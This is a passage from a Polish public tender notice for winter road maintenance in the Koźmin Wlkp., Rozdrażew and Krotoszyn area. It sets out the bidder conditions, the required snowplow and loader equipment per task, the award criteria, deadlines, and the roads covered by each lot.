                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, a polegających na udzieleniu, w okresie 3 lat od dnia udzielenie zamówienia podstawowego, dotychczasowemu wykonawcy usług, zamówienia polegającego na powtórzeniu podobnych usług, zamówienia polegającego na powtórzeniu podobnych usług w wysokości 50 % zamówieni podstawowego.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Ocena spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawcy dokonana zostanie na podstawie polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	związanej z przedmiotem zamówienia. Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada  polisą OC, a w przypadku jej braku inny dokument. potwierdzającym, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 50.000,00 zł. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Ocena spełnienia warunku dotyczącego  posiadania zdolności technicznych zostanie dokonana na podstawie wykazu sprzętu stanowiącego załącznik nr 3 SIWZ.Warunek zostanie spełniony, jeżeli wykonawca wykaże dysponowanie potencjałem technicznym niezbędnym do wykonania zamówienia. Wykonawca winien dysponować sprawnymi pojazdami/sprzętem  tak, aby realizacja usługi związana z 
               zimowym utrzymaniem dróg przebiegała sprawnie. W tym przypadku Wykonawca musi mieć dostępny 
               w minimalnym zakresie zestaw sprzętu do prowadzenia  akcji zimowego utrzymania dróg:

ZADANIE I 
Wykonawca w minimalnym zakresie musi mieć dostępny następujący sprzęt:

do odśnieżania

a)	pług odśnieżny minimum  średni lub ciężki  na ciągnikach o mocy powyżej 100 KM  sztuk 6,
b)	ładowarka czołowa o pojemności łyżki min. 2,0 m  sztuk 1 ( w zależności od potrzeb do przemieszczania zasp śnieżnych na drogach poza miejskich),
            
ZADANIE II 
Wykonawca w minimalnym zakresie musi mieć dostępny następujący sprzęt:

do odśnieżania
a)	pług odśnieżny minimum średni lub ciężki  na ciągnikach o mocy powyżej 100 KM sztuk 6,
b)	ładowarka czołowa o pojemności łyżki min. 2,0 m  sztuk 1 ( w zależności od potrzeb do przemieszczania zasp śnieżnych na drogach poza miejskich),

ZADANIE III  
Wykonawca w minimalnym zakresie musi mieć dostępny następujący sprzęt:
do odśnieżania
a)	pług odśnieżny minimum średni lub ciężki  na ciągnikach o mocy powyżej 100 KM sztuk 2,
             

ZADANIE IV  
Wykonawca w minimalnym zakresie musi mieć dostępny następujący sprzęt:
do odśnieżania
a)	pług odśnieżny minimum średni lub ciężki  na ciągnikach o mocy powyżej 100 KM sztuk 4,
b)	ładowarka czołowa o pojemności łyżki min.2,0  m  sztuk 1 ( w zależności od potrzeb do przemieszczania zasp śnieżnych na drogach poza miejskich),



ZADANIE V  
Wykonawca w minimalnym zakresie musi mieć dostępny następujący sprzęt:
do odśnieżania

a)	pług odśnieżny minimum średni lub ciężki  na ciągnikach o mocy powyżej 100 KM sztuk 4,
b)	ładowarka czołowa o pojemności łyżki min. 2,0 m  sztuk 1 ( w zależności od potrzeb do przemieszczania zasp śnieżnych na drogach poza miejskich),

ZADANIE VI 
Wykonawca w minimalnym zakresie musi mieć dostępny następujący sprzęt:
do odśnieżania
a)	pług odśnieżny minimum średni lub ciężki  na ciągnikach o mocy powyżej 100 KM sztuk 4
b)	ładowarka czołowa o pojemności łyżki min. 2,0 m  sztuk 1 ( w zależności od potrzeb do przemieszczania zasp śnieżnych na drogach poza miejskich),

ZADANIE VII
Wykonawca w minimalnym zakresie musi mieć dostępny następujący sprzęt:
do odśnieżania
a)	pług odśnieżny minimum średni lub ciężki  na ciągnikach o mocy powyżej 100 KM sztuk 5,
b)	ładowarka czołowa o pojemności łyżki min.2,0 m  sztuk 1 ( w zależności od potrzeb do przemieszczania zasp śnieżnych na drogach poza miejskich),


ZADANIE VIII
Wykonawca w minimalnym zakresie musi mieć dostępny następujący sprzęt:
do odśnieżania
a)	pług odśnieżny minimum średni lub ciężki  na ciągnikach o mocy powyżej 100 KM sztuk 5,
b)	ładowarka czołowa o pojemności łyżki min. 2,0 m  sztuk 1 ( w zależności od potrzeb do przemieszczania zasp śnieżnych na drogach poza miejskich).

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  nie
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie o spełnieniu warunków udziału w postępowaniu, sporządzonego według wzoru stanowiącego załącznik nr 2 do SIWZ;Zdolności techniczne Wykonawcy usług  w celu wykonania zamówienia wraz z informacją o podstawie 
dysponowania tymi zasobami o treści odpowiadającej załącznikowi nr 3 do SIWZ;Zdolności zawodowe osób , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług w tym osoby odpowiedzialnej za prowadzenie akcji zimowej.Osoby, które uczestniczą w realizacji zamówienia powinny dysponować odpowiednimi uprawnieniami do kierowania pojazdami lub/oraz uprawnienia operatora zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 21.01.2004 r. (Dz. U. nr 24 poz.215 ze zm.) w sprawie wydawania uprawnień do 
kierowania pojazdami o treści odpowiadającej załącznikowi nr 4 do SIWZ,Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności  wskazane w wykazie osób, mają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek takich uprawnień o treści odpowiadającej załącznikowi nr 4a do SIWZ,Wykonawca musi posiadać polisę OC, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 50.000,00 zł,oświadczenie o spełnieniu warunku dotyczącego nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 ustawy PZP Wykonawcy dokonana zostanie w oparciu o oświadczenie o braku podstaw wykluczenia 
zgodnie z  art. 24 ust.1 PZP, wg wzoru stanowiącego załącznik nr 5 do SIWZ.



<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz oferty, wg wzoru Zamawiającego, o treści odpowiadającej załącznikowi nr 1 do SIWZ,Formularz cenowy stanowiący załącznik nr 1a do SIWZ odpowiednio do zadania,Wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcom o treści odpowiadającej załącznikowi nr 7 do SIWZ.(w przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia wymagany wykaz może być 
złożony wspólnie lub oddzielnie przez wykonawców).Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o które 
mowa w art. 86 ust. 5 ustawy PZP, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z Innym wykonawcą nie prowadza do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.Dokument ten będzie stanowić załącznik nr 8 do SIWZ,Wykonawca może w celu potwierdzenia warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolności technicznej lub zawodowej lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków prawnych.Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. o treści odpowiadającej załącznikowi nr 6 SIWZ.W przypadku 	składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz osób umocowanych przez Wykonawcę konieczne jest złożenie pełnomocnictwa. Pełnomocnictwo winno być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza.


</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Dopuszcza się możliwość dokonywania zmian postanowień zawartej umowy. 
Podstawą zmian zapisu umowy będzie:zmiana terminu realizacji przedmiotu zamówienia,zmiana osób do nadzorowania zadania oraz bezpośredniego wykonywania zadania,zmiana stawki podatku VAT,z przyczyn organizacyjnych ze strony Zamawiającego lub Wykonawcy w tym strukturze organizacyjnej (zmiana lokalizacji siedziby, zmiana formy prawnej prowadzenia działalności).
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 26/10/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>ZADANIE NR 1 zimowe utrzymanie dróg na terenie Miasta i Gminy Koźmin Wlkp<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg obejmuje następujące odcinki ulic i dróg powiatowych:MIASTO KOŹMIN WLKP ( ulice):I kolejność standard 3:
Cieszyńskiego; Dworcowa; Floriańska; Grębowska; Jana Pawła II; Kobylińska; Marcińca; Pleszewska; Podgórna; Poznańska: Prosta; Staniewska; Strzelecka; Targowa; Zamkowa; Zielony Rynek.DROGI POZA MIEJSKIE KOŹMIN WLKP :I kolejność standard 3,Droga powiatowa nr 5145 P :Koźmin Wlkp Dobrzyca do granicy powiatu,I kolejność standard 4:Droga powiatowa nr 5152 P -Koźmin Wlkp  Rozdrażew  do bazy SKR w Rozdrażewie, Droga powiatowa nr 4908 P Borzęciczki-Kacza Górka ,Droga powiatowa nr 4918 P  Kacza Górka granica powiatu krotoszyńskiego- Mokronos-Gościejew-Wielowieś ( skrzyżowanie z drogą nr 5136 na Wyganów),II kolejność- standard 5 :Droga Powiatowa nr 5133 P Koźmin Wlkp  Staniew-Mokronos-Józefów ( granica powiatu krotoszyńskiego),Droga powiatowa nr 4169 P Rusko-granica powiatu krotoszyńskiego- Wyrębin- Borzęciczki-Serafinów do drogi 4918P, 
Droga powiatowa nr 4171 P Koźmin Wlkp Nowa Obra-Stara Obra Golina (gr, powiatu Krotoszyńskiego),Droga powiatowa nr 5143 P Stara Obra Wałków-Borzęcice gr. powiatu pleszewskiego (Galew) ,Droga powiatowa nr 5146 P Borzęcice-Sapieżyn do drogi krajowej nr 15,Droga powiatowa nr 5149 P Cegielnia-Wyki- gr powiatu pleszewskiego do skrzyżowania z drogą gminną na Wyki,Droga powiatowa nr 5139 P Psie Pole-Kaniew-Dębiogóra-Czarny Sad do drogi krajowej nr 15 ,Droga powiatowa nr 5137P Mokronos-Skałów-Psie Pole-Koźmin Wlkp. ,Droga powiatowa nr 4919P Mokronos-Małgów, Droga powiatowa nr 4916 P Międzyborze gr. powiatu krotoszyńskiego- Pogorzałki Małe-Mycielin-Borzęciczki, Droga powiatowa nr 5148P Koźmin Wlkp Tatary-Grębów do skrzyżowania z drogą Trzemeszno-Cegielnia, Droga powiatowa nr 5138P Gościejew-Skałów, Droga powiatowa nr 5140 P Kaniew-Wronów-Benice  ( do Wronowa)- skrzyżowanie z drogą gminną.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatnści </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>ZADANIE NR 2  zimowe utrzymanie dróg na terenie Gminy Rozdrażew<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg obejmuje następujące odcinki dróg i ulic :GMINA ROZDRAŻEW: I kolejność standard 3:Droga powiatowa nr 4331P (Nowy Świat)-granica powiatu krotoszyńskiego- Nowa Wieś-Rozdrażew do miejscowości Brzoza( skrzyżowanie z drogą gminną Brzoza-Kobierno),II kolejność standard 4:Droga powiatowa nr 5152 P Rozdrażew- Koźmin ( od ul. Krotoszyńskiej do bazy SKR w Rozdrażewie),II kolejność standard 5:Droga powiatowa nr 5151P Rozdrażew-Trzemeszno-Grębów,Droga powiatowa nr 5149 P Wyki od skrzyżowania z drogą gminną- gr. powiatu pleszewskiego (Koźminiec),Droga powiatowa nr 5155P Rozdrażew-Rozdrażewek Różopole do skrzyżowania z drogą nr 5158 P, Droga powiatowa nr 5153 P Nowa Wieś Maciejew-Rozdrażewek,Droga powiatowa nr 5154P Rozdrażew-Rozdrażewek, Droga powiatowa nr 5156 P Rozdrażew- Dąbrowa- Kobierno ( skrzyżowanie z drogą 5158P),Droga powiatowa nr 5168P droga krajowa nr 15 Dzielice, Droga powiatowa nr 5148 P Grębów od skrzyżowania z drogą Trzemeszno-Cegielnia-Nowa Wieś-Koźminiec,

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>ZADANIE NR 3 zimowe utrzymanie dróg na terenie Miasta Krotoszyna <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg obejmuje następujące odcinki dróg i ulic:MIASTO KROTOSZYN (ulice)-I kolejność standard 3:Zdunowska od ul. Piastowskiej do ul. Kołłątaja; Szosa Benicka; Ogrodowskiego; Floriańska; Grudzielskiego; Klemczaka Konstytucja 3 Maja; Kobylińska; Kościuszki; Koźmińska ;Piastowska; Kozala od drogi krajowej nr 15 do miejscowości Brzoza( skrzyżowanie z drogą gminną Brzoza-Kobierno); 56 Pułku Piechoty Wlkp. Raszkowska; Spartańska; Stawna; 23 stycznia; Rawicka; Słowiańska ; Transportowa ; Wiśniowa; Benicka,II kolejność standard 3:Św. Antoniego ; Ceglarska; Chwaliszewska; Domki Farne; Dworcowa; Pukackiego; Fabryczna; Głowackiego; Kamienna; Kilińskiego; Klonowicza; Kobierska; Kopieczki; Kopernika; Langiewicza; Magazynowa; Masłowskiego; Młyńska ;Ofiar Katynia; Osadnicza; Plac Szkolny; Polna; Półwiejska; Przemysłowa; Robotnicza; Słodowa; Sosnowa; Spokojna; Staszica; 1 stycznia; Ściegiennego; Świętokrzyska; Wiejska; Więźniów Politycznych; Zacisze; Zamkowy Folwark.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>ZADANIE NR 4 zimowe utrzymanie dróg na terenie Gminy  Krotoszyna -wschód<br /><div style="padding-left: 20px"><b>
